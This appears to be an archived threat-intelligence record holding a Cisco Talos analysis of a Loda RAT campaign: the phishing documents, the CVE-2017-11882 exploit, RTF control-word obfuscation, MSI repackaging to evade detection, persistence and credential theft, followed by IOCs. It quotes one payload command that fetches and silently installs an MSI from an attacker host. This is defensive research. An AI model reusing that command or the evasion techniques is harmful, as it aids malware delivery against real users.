{
	"id": "4b460c10-eadb-4115-a4e1-d6b3a7dc0672",
	"created_at": "2026-04-06T00:12:36.335785Z",
	"updated_at": "2026-04-10T13:12:45.241118Z",
	"deleted_at": null,
	"sha1_hash": "f7942b0715d59e9946dc54fdcf97b095e4cd449e",
	"title": "Loda RAT Grows Up",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1442300,
	"plain_text": "Loda RAT Grows Up\r\nBy Chris Neal\r\nPublished: 2020-02-12 · Archived: 2026-04-05 23:13:16 UTC\r\nWednesday, February 12, 2020 14:45\r\nOver the past several months, Cisco Talos has observed a malware campaign that utilizes websites hosting\r\na new version of Loda, a remote access trojan (RAT) written in AutoIT.\r\nThese websites also host malicious documents that begin a multi-stage infection chain which ultimately\r\nserves a malicious MSI file. The second-stage document exploits CVE-2017-11882 to download and run\r\nthe MSI file, which contains Loda version 1.1.1.\r\nThis campaign appears to be targeting countries in South America and Central America, as well as the U.S.\r\nWhat's New?\r\nTalos has observed several changes in this version of Loda. The obfuscation technique used within the AutoIT\r\nscript changed to a different form of string encoding. Multiple persistence mechanisms have been employed to\r\nensure Loda continues running on the infected host following reboots. Lastly, the new version leverages WMI to\r\nenumerate antivirus solutions running on the infected host.\r\nhttps://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html\r\nPage 1 of 10\n\nHow Did it Work?\r\nThe Loda sample analyzed in this post is delivered via a document chain. The first document contains an OOXML\r\nrelationship to a second document that contains an exploit. Once the exploit is triggered, an MSI file that contains\r\nthe Loda RAT is downloaded to the target host and executed. While the main purpose of this RAT is to steal\r\nusernames, passwords, and cookies saved within browsers, it also has keylogging, sound recording and screenshotting\r\ncapabilities, and the ability to allow the threat actor to send messages to the infected host.\r\nSo What?\r\nLoda is a simple, yet effective, RAT that has matured over time. This RAT is a good example of how effective\r\nrelatively simple techniques combined with basic obfuscation can be. 
The techniques this malware employs are of\r\nfairly low complexity and show that slight changes in implementation can significantly reduce detection rates.\r\nThe Campaign\r\nTelemetry from Cisco Umbrella shows that this campaign is quite active and seems to be targeting countries in\r\nSouth America, Central America and the U.S. The majority of the queries to the C2 domain\r\n\"4success[.]zapto[.]org\" originate from Brazil, Costa Rica and the United States. Similarly, the queries to\r\n\"success20[.]hopto[.]org\" originate from Argentina, Brazil and the United States. Our telemetry also shows that\r\nC2 communications go as far back as the last quarter of 2019.\r\nDNS queries to 4success[.]zapto[.]org\r\nInfection chain\r\nAt the time of analysis, several steps of the infection chain had a relatively low detection rate due to various\r\nobfuscation techniques. The initial document is delivered via a phishing email that contains the first-stage\r\ndocument as an attachment.\r\nExample of an email from this campaign\r\nThe first document in the infection chain, titled in one instance \"comprobante de confirmación de pago.docx\",\r\ncontains an OOXML relationship, located in \"/word/_rels\", that points to a second document at\r\n\"http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc\". Aside from this OOXML relationship, the initial\r\ndocument isn't particularly noteworthy. The document uses this two-stage document technique to bypass some\r\nemail filters.\r\nOOXML Relationship\r\nThe second document is a Rich Text Format document that contains a payload within an obfuscated OLE object\r\nwhich is then executed by exploiting CVE-2017-11882, an arbitrary code execution vulnerability in some versions\r\nof Microsoft Office. 
The contents of the Author field, \"obidah qudah\", in the metadata of this document appear to\r\nbe constant across all samples analyzed during the investigation.\r\nWhen we looked deeper into this author's name, we discovered they have a relatively long history of being\r\nassociated with malicious RTF documents. Starting in 2017, there have been just under 1,300 malicious\r\ndocuments submitted to VirusTotal that contain \"obidah qudah\" in the author field. An overwhelming majority of\r\nthese submissions are RTF documents that exploit CVE-2017-11882.\r\nHowever, the \"Last Modified By\" field is not static throughout these documents. There appear to be multiple\r\ncampaigns over the last few years, starting in 2017, that use the \"obidah qudah\" author name, with each campaign\r\nusing a different \"Last Modified By\" field, with many serving malware other than Loda. It is unclear whether\r\nthese campaigns were initiated by the same threat actor, or if a single malicious RTF document builder was used\r\nby multiple different actors. In the documents analyzed in this post, the \"Last Modified By\" value is set to\r\n\"Richard.\"\r\nAuthor labeled as \"obidah qudah\"\r\nThe OLE object within this document that contains the exploit and payload employs an interesting obfuscation\r\ntechnique that utilizes RTF control words.\r\nObfuscated payload\r\nThe control word \"\\par\" used in the object indicates the end of a paragraph, while the \"\\*\" has a slightly more\r\ncomplex function. 
The \"\\*\" control word instructs an RTF reader to ignore the following control words only if\r\nthey are not understood by the reader, which allows the author to include false control words (ex: \\par67234).\r\nUsing this technique to break up the OLE object not only obfuscates the payload but also prevents RTF\r\nparsers from reading the object in its entirety. Once it is executed, the control words will be ignored, concatenating the\r\nbytes in between into the exploit payload as shown below.\r\nDeobfuscated payload\r\nWithin this payload, the command \"cmd.exe \u0026 /C CD C: \u0026 msiexec.exe /i http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi /quiet\" can be seen. Once the exploit is triggered, a\r\nmalicious MSI file is then downloaded and executed.\r\nThis MSI was created using Exe2Msi, a common tool used to repackage Windows executables as an MSI file.\r\nAlthough this tool is most often used with legitimate software, it is also frequently used by malware authors. One\r\nof the benefits of delivering malware in an MSI package is that it provides a lower detection rate. Simply\r\nrepackaging a malicious executable as an MSI file can reduce detection rates with very little effort. If repackaged\r\nas an MSI, the detection rate of a malicious executable can drop by up to 50 percent on VirusTotal. Combined\r\nwith other forms of obfuscation, this can result in a crude, yet effective, means of evasion.\r\nThe malware\r\nAt execution, \"fkrkdn.msi\" extracts an executable at \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Windata\\JLMWFF.exe.\" This is the Loda 1.1.1 binary, which is a compiled AutoIT\r\nscript. 
A detailed write-up by Proofpoint on a previous version of Loda and its functionality can be found here.\r\nThe initial C2 beacon was captured from \"JLMWFF.exe\" and contained the unique signature \"ZeXro0\" repeated\r\nseveral times, which is not present in other versions of Loda. The C2 communications to \"4success[.]zapto[.]org\"\r\ncontain information about the infected host, including OS version, architecture and username. This also reveals\r\nthat this version of Loda is \"1.1.1.\" Aside from the unique signature, this beacon format is the same as in previous\r\nversions.\r\nEven though this new version of Loda has nearly identical functionality to previous versions, there are significant\r\ndifferences in implementation and design. Some of the functions within the script have been completely rewritten,\r\nwith the most readily apparent change being the obfuscation technique used. In version 1.1.1, almost every string\r\nor variable is obfuscated using the simple encoding algorithm shown below.\r\nLoda's encoding algorithm\r\nThere are a few key changes in functionality in version 1.1.1. To detect what antivirus software is running on the\r\nhost, earlier versions of Loda would call the AutoIT function PROCESSEXISTS() for each antivirus software\r\nprocess name. Loda 1.1.1 now makes a WMI query to \"winmgmts:\\\\localhost\\root\\SecurityCenter2\" to enumerate\r\ninstalled antivirus solutions, as shown below in the deobfuscated code:\r\nAV enumeration function\r\nFor persistence, the new version now adds both a registry key and a scheduled task:\r\nPersistence mechanism\r\nA new capability in this version is the ability to read the contents of \"\\filezilla\\recentservers.xml\". This document\r\ncontains the IP addresses, usernames and passwords of servers that Filezilla has recently connected to. 
It is\r\nimportant to note that these passwords are stored either in plaintext or base64-encoded.\r\nOne interesting function that persists through the versions of Loda is the command \"QURAN\". This\r\ncommand streams music from \"live.mp3quran[.]net:9976\" in Windows Media Player using the Microsoft Media\r\nServer (MMS) protocol. MMS is a deprecated Microsoft proprietary network streaming protocol used to stream\r\nmedia in Windows Media Player.\r\n\"QURAN\" command function\r\nThere is no other functionality to this command other than playing the music that is streaming at this URL to the\r\ninfected host.\r\nConclusion\r\nAlthough the functionality of this new version of Loda is similar to previous versions, this new iteration is a\r\nslightly better-developed RAT. Loda is simple yet has proven to be effective, and poses a serious threat to an\r\ninfected host. The credential-stealing capabilities could lead to significant financial loss or a potential data breach.\r\nBy changing the obfuscation techniques the threat actor was able to lower the detection rate considerably. 
The\r\nchanges in persistence mechanisms and AV solution detection show that the malware authors are actively\r\nimproving the functionality of Loda.\r\nCoverage\r\nSnort [SID] 53031\r\nClamAV\r\nWin.Packed.LokiBot-6963314-0\r\nDoc.Exploit.Cve_2017_11882-7570663-1\r\nDoc.Downloader.Loda-7570590-0\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on 
Snort.org.\r\nIOCs:\r\nhttp://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc\r\nhttp://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi\r\nhttp://lcodigo[.]com/apiW/config/uploads/tmp/kctlqz.msi\r\nhttp://drinkfoodapp[.]com/AdminDF/assets/img/app/settings.doc\r\nhttp://drinkfoodapp[.]com/AdminDF/assets/img/app/grcfne.msi\r\nhttp://yewonder[.]com/wp-content/plugins/ltfhmam/eklnxx.msi\r\nhttps://www[.]miracleworkstudios[.]com/wp-content/uploads/2019/12/app/updates.doc\r\nhttp://wp[.]168gamer[.]com/secured/mcsonb.msi\r\nhttp://wp[.]168gamer[.]com/secured/office.doc\r\nDocs:\r\nb5df816986a73e890f41ff0c0470a2208df523f17eb4eac9c5f0546da2ec161e\r\naf42191fe2ea328080939ec656302a8f364dac44b5cd8277dcbaeb15ff499178\r\n36865059f1c142ba1846591aae8d78d8a109a0dc327a88547e41e3663bad2eaf\r\ne15336491ab57a16a870edd5b135014b62387cb45e4e490b9d4091c54394dec4\r\nMSI:\r\n9edd2bfdb0c177f046cec1392d31ee3f67174e0a23fdf7e4b6fd580e769f0493\r\n8b989db4a9f8c3f0fa825cca35386ac4be4e33fd2ea53a118d4f4dd8259aeccc\r\n633f3970c31c9cb849bd5f66c3a783538bb2327b4bec5774b870f8b3b53ea3c1\r\nc65668958c5dfeccb40abd0771c17d045f24c78f51ea6c3955e110f53ad8eece\r\n740a5c19645d5a90fc1e11c84f5d6a058dc50206337aa37bbc783bd54ba84a79\r\n6cb47f2ecd58349ffe65d7ea281eea2ebd231bbaac30843f872ae2249bd140b0\r\nC2:\r\n4success[.]zapto[.]org\r\nsuccess20[.]hopto[.]org\r\nbreakthrough[.]hopto[.]org\r\nSource: https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html"
	],
	"report_names": [
		"loda-rat-grows-up.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434356,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f7942b0715d59e9946dc54fdcf97b095e4cd449e.pdf",
		"text": "https://archive.orkl.eu/f7942b0715d59e9946dc54fdcf97b095e4cd449e.txt",
		"img": "https://archive.orkl.eu/f7942b0715d59e9946dc54fdcf97b095e4cd449e.jpg"
	}
}